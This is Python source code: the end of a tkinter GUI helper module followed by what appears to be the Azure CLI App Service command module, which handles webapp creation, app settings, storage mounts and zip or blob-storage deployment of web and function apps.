    def _fire(self, virtual_event):
        # Every command simply triggers the corresponding virtual event
        # on the underlying text widget
        self.text.event_generate(virtual_event)

    def can_cut(self):
        selected = self.get_selected_text()
        if not selected:
            return selected
        return not self.selection_is_read_only()

    def can_copy(self):
        return self.get_selected_text()

    def can_paste(self):
        return not self.selection_is_read_only()

    def get_selected_text(self):
        try:
            return self.text.get("sel.first", "sel.last")
        except TclError:
            # No selection present
            return ""

    def selection_is_read_only(self):
        widget = self.text
        return widget.is_read_only() if hasattr(widget, "is_read_only") else False
def create_url_label(master, url, text=None):
    """Create, grid and return a clickable hyperlink-style label.

    Clicking the label opens url in the default browser; the caption
    defaults to the url itself.
    """
    import webbrowser

    caption = text if text else url
    link_font = tkinter.font.nametofont("TkDefaultFont").copy()
    link_font.configure(underline=1)
    label = ttk.Label(
        master, text=caption, style="Url.TLabel", cursor="hand2", font=link_font
    )
    label.grid()

    def _open_in_browser(_event):
        webbrowser.open(url)

    label.bind("<Button-1>", _open_in_browser)
    return label
def get_size_option_name(window):
    """Return the option key under which this window type's size is stored."""
    return "layout.{}_size".format(type(window).__name__)
def get_default_theme():
    """Name of the ttk UI theme used by default on this platform."""
    if running_on_windows():
        return "Windows"
    if running_on_rpi():
        return "Raspberry Pi"
    return "Enhanced Clam"
def get_default_basic_theme():
    """Name of the stock ttk theme used as the fallback on this platform."""
    return "xpnative" if running_on_windows() else "clam"
# Cached pixel width of "m" in TkDefaultFont (measured lazily on first use)
EM_WIDTH = None


def ems_to_pixels(x):
    """Convert a length given in em units into pixels.

    Requires a Tk root to exist, because the default font is measured
    on the first call.
    """
    global EM_WIDTH
    if EM_WIDTH is None:
        EM_WIDTH = tkinter.font.nametofont("TkDefaultFont").measure("m")
    return int(EM_WIDTH * x)
# Cached padding string for button captions (computed once via get_button_padding)
_btn_padding = None


def tr_btn(s):
    """Translates button caption, adds padding to make sure text fits"""
    global _btn_padding
    if _btn_padding is None:
        _btn_padding = get_button_padding()
    return _btn_padding + tr(s) + _btn_padding
if __name__ == "__main__":
    # Manual smoke test: exercise EnhancedIntVar inside a bare Tk root
    root = tk.Tk()
    var = EnhancedIntVar(value=2)
    print(var.get())
    var.set(3)
    print(repr(var.get()))
    root.mainloop()
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import threading
import time
import ast
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
ArgumentUsageError, MutuallyExclusiveArgumentError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_name,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
# One logger per module, following the azure-cli convention
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None,  # pylint: disable=too-many-statements,too-many-branches
                  deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
                  deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
                  multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
                  using_webapp_up=False, language=None, assign_identities=None,
                  role='Contributor', scope=None):
    """Create (or update, if the name already exists in this subscription) a webapp.

    Handles Linux, Windows container (xenon) and plain Windows plans, wires up
    container registry settings, source control / local git, managed identity,
    and the extra app settings used by 'az webapp up' (using_webapp_up=True).
    Returns the created/updated Site object.
    """
    SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
        'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')

    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)

    client = web_client_factory(cmd.cli_ctx)
    # The plan may be given as a full resource id or as a name in the same group
    if is_valid_resource_id(plan):
        parse_result = parse_resource_id(plan)
        plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
    else:
        plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
    if not plan_info:
        raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
    is_linux = plan_info.reserved  # "reserved" is the API's flag for Linux plans
    node_default_version = NODE_EXACT_VERSION_DEFAULT
    location = plan_info.location
    # This is to keep the existing appsettings for a newly created webapp on existing webapp name.
    name_validation = get_site_availability(cmd, name)
    if not name_validation.name_available:
        if name_validation.reason == 'Invalid':
            raise CLIError(name_validation.message)
        logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
                           "the app is a part of the current subscription".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        # Carry over the existing app settings so the update does not wipe them
        existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
                                                        name, 'list_application_settings')
        settings = []
        for k, v in existing_app_settings.properties.items():
            settings.append(NameValuePair(name=k, value=v))
        site_config = SiteConfig(app_settings=settings)
    else:
        site_config = SiteConfig(app_settings=[])
    # always_on is not supported on the free/shared/basic tiers
    if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
                                                                                       'B1', 'B2', 'B3', 'BASIC']:
        site_config.always_on = True
    webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
                      https_only=using_webapp_up)
    helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
    if runtime:
        runtime = helper.remove_delimiters(runtime)

    current_stack = None
    if is_linux:
        # Exactly one of runtime / container image / multicontainer config is allowed
        if not validate_container_app_create_options(runtime, deployment_container_image_name,
                                                     multicontainer_config_type, multicontainer_config_file):
            raise CLIError("usage error: --runtime | --deployment-container-image-name |"
                           " --multicontainer-config-type TYPE --multicontainer-config-file FILE")
        if startup_file:
            site_config.app_command_line = startup_file

        if runtime:
            match = helper.resolve(runtime)
            if not match:
                raise CLIError("Linux Runtime '{}' is not supported."
                               " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
            match['setter'](cmd=cmd, stack=match, site_config=site_config)
        elif deployment_container_image_name:
            site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            if name_validation.name_available:
                site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
                                                              value="false"))
        elif multicontainer_config_type and multicontainer_config_file:
            encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
            site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)

    elif plan_info.is_xenon:  # windows container webapp
        if deployment_container_image_name:
            site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
            # set the needed app settings for container image validation
            if name_validation.name_available:
                site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
                                                              value=docker_registry_server_user))
                site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
                                                              value=docker_registry_server_password))
                site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
                                                              value=docker_registry_server_url))

    elif runtime:  # windows webapp with runtime specified
        if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
            raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
                           "--multicontainer-config-type and --multicontainer-config-file is "
                           "only appliable on linux webapp")
        match = helper.resolve(runtime)
        if not match:
            raise CLIError("Windows runtime '{}' is not supported. "
                           "Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
        match['setter'](cmd=cmd, stack=match, site_config=site_config)

        # TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
        # portal uses the current_stack property in metadata to display stack for windows apps
        current_stack = get_current_stack_from_runtime(runtime)

    else:  # windows webapp without runtime specified
        if name_validation.name_available:  # If creating new webapp
            site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                          value=node_default_version))

    if site_config.app_settings:
        for setting in site_config.app_settings:
            logger.info('Will set appsetting %s', setting)
    if using_webapp_up:  # when the routine is invoked as a help method for webapp up
        if name_validation.name_available:
            logger.info("will set appsetting for enabling build")
            site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
    if language is not None and language.lower() == 'dotnetcore':
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
                                                          value='https://{}.scm.azurewebsites.net/detectors'
                                                          .format(name)))

    poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
    webapp = LongRunningOperation(cmd.cli_ctx)(poller)

    # TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
    if current_stack:
        _update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)

    # Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
    _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
                             deployment_source_branch, deployment_local_git)

    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)

    if deployment_container_image_name:
        logger.info("Updating container settings")
        update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
                                  deployment_container_image_name, docker_registry_server_user,
                                  docker_registry_server_password=docker_registry_server_password)

    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        webapp.identity = identity

    return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
                                          multicontainer_config_type=None, multicontainer_config_file=None):
    """Return True when exactly one way of specifying Linux app content is used.

    The multicontainer config type and file must be supplied together; beyond
    that, exactly one of runtime / container image / multicontainer config
    may be set.
    """
    # config type and file only make sense as a pair
    if bool(multicontainer_config_type) != bool(multicontainer_config_file):
        return False
    provided = sum(
        1 for option in (runtime, deployment_container_image_name, multicontainer_config_type) if option
    )
    return provided == 1
def parse_docker_image_name(deployment_container_image_name):
    """Extract the registry server part of a container image reference.

    Returns None when no registry host is present (plain Docker Hub images
    such as 'nginx' or 'library/nginx'): the prefix before the last slash
    only counts as a registry when it contains a dot or a port separator.
    """
    if not deployment_container_image_name:
        return None
    prefix, separator, _ = deployment_container_image_name.rpartition('/')
    if not separator:
        return None
    if "." in prefix or ":" in prefix:
        return prefix
    return None
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
    """Create or change app settings, optionally marking some as slot-sticky.

    Each entry is either KEY=VALUE or JSON (including the output of the
    'list' command). Slot settings are additionally recorded among the app's
    slot configuration names so they stay with the slot during swaps.
    """
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')

    settings = settings or []
    slot_settings = slot_settings or []

    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    result, slot_result = {}, {}
    # pylint: disable=too-many-nested-blocks
    for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
        for s in src:
            try:
                temp = shell_safe_json_parse(s)
                if isinstance(temp, list):  # a bit messy, but we'd like accept the output of the "list" command
                    for t in temp:
                        if 'slotSetting' in t.keys():
                            slot_result[t['name']] = t['slotSetting']
                        if setting_type == "SlotSettings":
                            slot_result[t['name']] = True
                        result[t['name']] = t['value']
                else:
                    dest.update(temp)
            except CLIError:
                # Not JSON — fall back to KEY=VALUE parsing
                setting_name, value = s.split('=', 1)
                dest[setting_name] = value

    # NOTE(review): after the loop 'dest' is still bound to slot_result (the
    # last iteration), so this merges the slot settings into the combined
    # result — presumably intentional, but worth confirming
    result.update(dest)
    for setting_name, value in result.items():
        app_settings.properties[setting_name] = value
    client = web_client_factory(cmd.cli_ctx)

    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings, slot, client)

    app_settings_slot_cfg_names = []
    if slot_result:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        # the service may return None instead of an empty list
        slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
        # Slot settings logic to add a new setting(s) or remove an existing setting(s)
        for slot_setting_name, value in slot_result.items():
            if value and slot_setting_name not in slot_cfg_names.app_setting_names:
                slot_cfg_names.app_setting_names.append(slot_setting_name)
            elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
                slot_cfg_names.app_setting_names.remove(slot_setting_name)
        app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)

    return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
                              share_name, access_key, mount_path=None, slot=None, slot_setting=False):
    """Attach a new Azure Files/Blob storage mount (BYOS) to a webapp.

    Fails when a configuration with the same custom_id already exists (use
    the 'update' command for that). With slot_setting=True the id is also
    pinned as a slot configuration name so it stays with the slot on swap.
    """
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    if custom_id in azure_storage_accounts.properties:
        raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
                       "Use 'az webapp config storage-account update' to update an existing "
                       "Azure storage account configuration.".format(custom_id))

    azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
                                                                         share_name=share_name, access_key=access_key,
                                                                         mount_path=mount_path)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts,
                                         slot, client)

    if slot_setting:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        # the service may return None instead of an empty list
        slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in slot_cfg_names.azure_storage_config_names:
            slot_cfg_names.azure_storage_config_names.append(custom_id)
            client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)

    return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
                                 share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
    """Update an existing BYOS storage mount identified by custom_id.

    Arguments left as None keep their current values; fails when no
    configuration with custom_id exists (use 'add' to create one).
    """
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')

    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    # pop the old entry so the merged value below fully replaces it
    existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)

    if not existing_account_config:
        raise CLIError("No Azure storage account configuration found with the id '{}'. "
                       "Use 'az webapp config storage-account add' to add a new "
                       "Azure storage account configuration.".format(custom_id))

    # merge: unspecified arguments fall back to the existing configuration
    new_account_config = AzureStorageInfoValue(
        type=storage_type or existing_account_config.type,
        account_name=account_name or existing_account_config.account_name,
        share_name=share_name or existing_account_config.share_name,
        access_key=access_key or existing_account_config.access_key,
        mount_path=mount_path or existing_account_config.mount_path
    )

    azure_storage_accounts.properties[custom_id] = new_account_config

    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts,
                                         slot, client)

    if slot_setting:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        # the service may return None instead of an empty list
        slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in slot_cfg_names.azure_storage_config_names:
            slot_cfg_names.azure_storage_config_names.append(custom_id)
            client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)

    return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
    """Zip-deploy a function app, choosing between storage upload and Kudu.

    Linux consumption apps without remote build get the package uploaded to
    the AzureWebJobsStorage account (WEBSITE_RUN_FROM_PACKAGE); everything
    else goes through the Kudu zipdeploy endpoint, with the remote-build app
    settings toggled accordingly.
    """
    client = web_client_factory(cmd.cli_ctx)
    app = client.web_apps.get(resource_group_name, name)
    if app is None:
        raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
                       'Please make sure these values are correct.'.format(name, resource_group_name))
    parse_plan_id = parse_resource_id(app.server_farm_id)
    plan_info = None
    retry_delay = 10  # seconds
    # We need to retry getting the plan because sometimes if the plan is created as part of function app,
    # it can take a couple of tries before it gets the plan
    for _ in range(5):
        plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
                                                 parse_plan_id['name'])
        if plan_info is not None:
            break
        time.sleep(retry_delay)

    if build_remote and not app.reserved:
        raise CLIError('Remote build is only available on Linux function apps')

    is_consumption = is_plan_consumption(cmd, plan_info)
    # Linux consumption without remote build cannot use Kudu zipdeploy —
    # fall back to uploading the package to the storage account
    if (not build_remote) and is_consumption and app.reserved:
        return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
    if build_remote:
        add_remote_build_app_settings(cmd, resource_group_name, name, slot)
    else:
        remove_remote_build_app_settings(cmd, resource_group_name, name, slot)

    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Zip-deploy a webapp via the Kudu zipdeploy endpoint (thin wrapper)."""
    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Push a local zip package to the app's Kudu zipdeploy endpoint and wait
    for the asynchronous deployment to finish.

    Raises CLIError on HTTP 409 (another deployment in progress, or the app
    still has WEBSITE_RUN_FROM_PACKAGE set).
    """
    logger.warning("Getting scm site credentials for zip deployment")
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)

    try:
        scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    except ValueError:
        raise CLIError('Failed to fetch scm url for function app')

    zip_url = scm_url + '/api/zipdeploy?isAsync=true'
    deployment_status_url = scm_url + '/api/deployments/latest'

    import urllib3
    authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    headers = authorization
    headers['Content-Type'] = 'application/octet-stream'
    headers['Cache-Control'] = 'no-cache'
    headers['User-Agent'] = get_az_user_agent()

    import requests
    import os
    from azure.cli.core.util import should_disable_connection_verify
    # Read file content
    with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
        zip_content = fs.read()
        logger.warning("Starting zip deployment. This operation can take a while to complete ...")
        res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
        logger.warning("Deployment endpoint responded with status code %d", res.status_code)

    # check if there's an ongoing process
    if res.status_code == 409:
        raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
                       "Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
                       "is removed. Use 'az webapp config appsettings list --name MyWebapp --resource-group "
                       "MyResourceGroup --subscription MySubscription' to list app settings and 'az webapp "
                       "config appsettings delete --name MyWebApp --resource-group MyResourceGroup "
                       "--setting-names <setting-names> to delete them.".format(deployment_status_url))

    # check the status of async deployment
    response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
                                            authorization, timeout)
    return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Prepare app settings for a remote (Oryx) build and wait until the SCM
    site reflects them.

    Ensures SCM_DO_BUILD_DURING_DEPLOYMENT=true and removes
    WEBSITE_RUN_FROM_PACKAGE / ENABLE_ORYX_BUILD, which conflict with
    remote building.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None
    website_run_from_package = None
    enable_oryx_build = None

    app_settings_should_not_have = []
    app_settings_should_contain = {}

    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')
        if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
            website_run_from_package = value
        if keyval['name'] == 'ENABLE_ORYX_BUILD':
            enable_oryx_build = value

    if scm_do_build_during_deployment is not True:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=true"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'

    if website_run_from_package:
        logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "WEBSITE_RUN_FROM_PACKAGE"
        ], slot)
        app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')

    if enable_oryx_build:
        logger.warning("Removing ENABLE_ORYX_BUILD app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "ENABLE_ORYX_BUILD"
        ], slot)
        app_settings_should_not_have.append('ENABLE_ORYX_BUILD')

    # Wait for scm site to get the latest app settings
    if app_settings_should_not_have or app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        scm_is_up_to_date = False
        # poll up to ~10 times, 5 seconds apart
        retries = 10
        while not scm_is_up_to_date and retries >= 0:
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain,
                should_not_have=app_settings_should_not_have)
            retries -= 1
            time.sleep(5)

        if retries < 0:
            logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Disable remote build (SCM_DO_BUILD_DURING_DEPLOYMENT=false) and wait
    until the SCM site reflects the change. Mirror of
    add_remote_build_app_settings.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None

    app_settings_should_contain = {}

    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')

    if scm_do_build_during_deployment is not False:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=false"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'

    # Wait for scm site to get the latest app settings
    if app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        scm_is_up_to_date = False
        # poll up to ~10 times, 5 seconds apart
        retries = 10
        while not scm_is_up_to_date and retries >= 0:
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain)
            retries -= 1
            time.sleep(5)

        if retries < 0:
            logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
    """Deploy a zip package to a Linux consumption function app by uploading
    it to the app's AzureWebJobsStorage account and pointing
    WEBSITE_RUN_FROM_PACKAGE at a long-lived read-only SAS URL.

    After updating the app setting, function triggers are synced so the host
    picks up the new package.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)

    storage_connection = None
    for keyval in settings:
        if keyval['name'] == 'AzureWebJobsStorage':
            storage_connection = str(keyval['value'])

    if storage_connection is None:
        raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')

    container_name = "function-releases"
    # timestamp + uuid keeps blob names unique across deployments
    blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
    BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
    block_blob_service = BlockBlobService(connection_string=storage_connection)
    if not block_blob_service.exists(container_name):
        block_blob_service.create_container(container_name)

    # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
    def progress_callback(current, total):
        total_length = 30
        # BUGFIX: parentheses corrected so the whole ratio is rounded.
        # Previously round() was applied to the numerator alone
        # (int(round(total_length * current) / float(total))), which truncated
        # the bar length instead of rounding it.
        filled_length = int(round(total_length * current / float(total)))
        percents = round(100.0 * current / float(total), 1)
        progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
        progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
        cmd.cli_ctx.get_progress_controller().add(message=progress_message)

    block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
                                             progress_callback=progress_callback)

    # SAS valid for ~10 years, backdated 10 minutes to tolerate clock skew
    now = datetime.datetime.utcnow()
    blob_start = now - datetime.timedelta(minutes=10)
    blob_end = now + datetime.timedelta(weeks=520)
    BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
    blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
                                                                          blob_name,
                                                                          permission=BlobPermissions(read=True),
                                                                          expiry=blob_end,
                                                                          start=blob_start)

    blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
    website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
    update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
    client = web_client_factory(cmd.cli_ctx)

    try:
        logger.info('\nSyncing Triggers...')
        if slot is not None:
            client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
        else:
            client.web_apps.sync_function_triggers(resource_group_name, name)
    except CloudError as ex:
        # This SDK function throws an error if Status Code is 200
        if ex.status_code != 200:
            raise ex
    except Exception as ex:  # pylint: disable=broad-except
        # BUGFIX: guard against exceptions without a 'response' attribute;
        # previously ex.response raised a confusing AttributeError that
        # masked the original error.
        if getattr(ex, 'response', None) is None or ex.response.status_code != 200:
            raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
    """Show the details of a webapp (or one of its deployment slots)."""
    return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
    """Getter used by the generic 'az webapp update' machinery."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,  # pylint: disable=unused-argument
               skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):  # pylint: disable=unused-argument
    """Write back a (possibly modified) site object; setter of the generic updater."""
    site_envelope = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.begin_create_or_update_slot(
            resource_group_name=resource_group_name, name=name,
            site_envelope=site_envelope, slot=slot)
    return client.web_apps.begin_create_or_update(
        resource_group_name=resource_group_name, name=name, site_envelope=site_envelope)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
    """Apply simple boolean property updates to a web app site object.

    Flags arrive as the strings 'true'/'false'; anything else maps to False.
    Raises CLIError when pointed at a function app.
    """
    if 'function' in instance.kind:
        raise CLIError("please use 'az functionapp update' to update this function app")
    for attr, flag in (('client_affinity_enabled', client_affinity_enabled),
